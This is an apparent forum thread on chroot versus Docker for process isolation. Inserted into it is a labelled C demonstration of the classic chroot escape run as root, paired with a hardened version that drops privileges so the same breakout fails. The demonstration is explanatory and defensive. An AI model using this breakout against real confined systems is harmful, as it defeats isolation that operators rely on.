by doomrobo 4111 days ago
Pretty much. There's always the option of putting it in a container (using Docker, for instance) or VM but chroot is probably the most commonly used and has the least overhead.

Docker is not a security thing!
I hear this refrain a lot but I never really understood it. Could you explain? I would personally feel much more comfortable running a process as a unique user in a fresh Ubuntu container than running it in a chroot. One needn't go far to find a huge number of chroot escape methods.
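The chroot escape the reply above alludes to is worth seeing concretely, because the fix is as instructive as the breakout. The following is an added example, not code from the thread or from any project mentioned in it. It is the well-known "mkdir, chroot into the subdirectory, chdir('..') your way out" breakout, which works only while the process can still call chroot(2), i.e. while it holds CAP_SYS_CHROOT. The hardened variant does exactly what the reply describes, running as an unprivileged user after the chroot, and the same breakout then fails at the chroot(2) call with EPERM. Assumptions: Linux, a writable /tmp, uid/gid 65534 as the unprivileged "nobody" account, and that the program is run as root (otherwise both demos return SKIPPED rather than proving anything). A container adds mount and PID namespaces, a capability bounding set and a seccomp filter on top of this; chroot by itself changes only the root directory.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <grp.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Return codes of the two demo functions. */
enum { ESCAPED = 0, CONTAINED = 1, SKIPPED = -1 };

/* Assumed unprivileged uid/gid ("nobody" on most Linux systems). */
#define UNPRIV_ID 65534

static int same_inode(const struct stat *a, const struct stat *b)
{
    return a->st_dev == b->st_dev && a->st_ino == b->st_ino;
}

/* The classic breakout. It only works because chroot(2) itself is still
 * callable, which requires CAP_SYS_CHROOT (root, in practice). */
static int break_out(void)
{
    /* 1. Make a subdirectory of the current (jailed) cwd. */
    if (mkdir("jail_escape", 0700) != 0 && errno != EEXIST)
        return CONTAINED;
    /* 2. Move the root into it. cwd is NOT moved, so cwd is now outside the
     *    root and ".." is no longer clamped at the root boundary. */
    if (chroot("jail_escape") != 0)          /* EPERM without CAP_SYS_CHROOT */
        return CONTAINED;
    /* 3. Walk up until we reach the real filesystem root. */
    for (int i = 0; i < 64; i++)
        if (chdir("..") != 0)
            return CONTAINED;
    /* 4. Make the real root our root again. */
    if (chroot(".") != 0)
        return CONTAINED;
    return ESCAPED;
}

/* Build a throwaway jail under /tmp and chroot into it. The real root's
 * identity is saved in *real_root so the demos can tell where they ended up. */
static int enter_jail(struct stat *real_root, char *path, size_t len)
{
    if (geteuid() != 0) return SKIPPED;       /* chroot needs CAP_SYS_CHROOT */
    if (stat("/", real_root) != 0) return SKIPPED;
    snprintf(path, len, "/tmp/jailXXXXXX");
    if (mkdtemp(path) == NULL) return SKIPPED;
    if (chdir(path) != 0 || chroot(".") != 0) return SKIPPED;
    return 0;
}

/* chroot as root with no privilege drop: trivially escapable. */
int demo_root_escape(void)
{
    struct stat real_root, now;
    char path[64], sub[80];
    if (enter_jail(&real_root, path, sizeof path) != 0) return SKIPPED;
    int r = break_out();
    if (stat("/", &now) != 0) return CONTAINED;
    if (r == ESCAPED && same_inode(&real_root, &now)) {
        snprintf(sub, sizeof sub, "%s/jail_escape", path);  /* tidy up */
        rmdir(sub);
        rmdir(path);
        return ESCAPED;
    }
    return CONTAINED;
}

/* Hardened: chroot, then permanently drop to an unprivileged uid/gid.
 * The identical break_out() now fails at chroot(2). Call this last: the
 * process cannot regain root afterwards. */
int demo_dropped_privileges(void)
{
    struct stat real_root, now;
    char path[64];
    if (enter_jail(&real_root, path, sizeof path) != 0) return SKIPPED;
    chmod(".", 01777);  /* let mkdir succeed so chroot(2) is the failing step */
    if (setgroups(0, NULL) != 0 ||
        setresgid(UNPRIV_ID, UNPRIV_ID, UNPRIV_ID) != 0 ||
        setresuid(UNPRIV_ID, UNPRIV_ID, UNPRIV_ID) != 0)
        return SKIPPED;
    if (setuid(0) == 0) return SKIPPED;       /* drop must be irreversible */
    int r = break_out();
    if (stat("/", &now) != 0) return CONTAINED;
    return (r == CONTAINED && !same_inode(&real_root, &now)) ? CONTAINED : ESCAPED;
}

int main(void)
{
    printf("root, no privilege drop:   %s\n",
           demo_root_escape() == ESCAPED ? "escaped" : "contained/skipped");
    printf("root, then drop to nobody: %s\n",
           demo_dropped_privileges() == CONTAINED ? "contained" : "escaped/skipped");
    return 0;
}
```

Run it as root (e.g. under sudo) to see both outcomes; as an ordinary user both demos are skipped because the initial chroot(2) is itself refused. The hardened demo leaves a world-writable directory under /tmp behind, since the unprivileged process can no longer remove it.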
In this OS, are chroots enough to "withstand zero-day attacks in userspace", e.g. in combination with other hardening features?
Yes, the lack of a network stack prevents the most common attacks, and drastically reduces the usefulness of gaining control of the system.
I had to look up "zero-day attack", but it really meant what I thought it did, i.e. a previously unreported ("fresh") exploit (http://en.wikipedia.org/wiki/Zero-day_attack).

I don't understand this usage, which makes it sound as if zero-day attacks are a technical term, a category of attacks. Can anyone clarify?

It's more of a business term, e.g. http://en.wikipedia.org/wiki/Vupen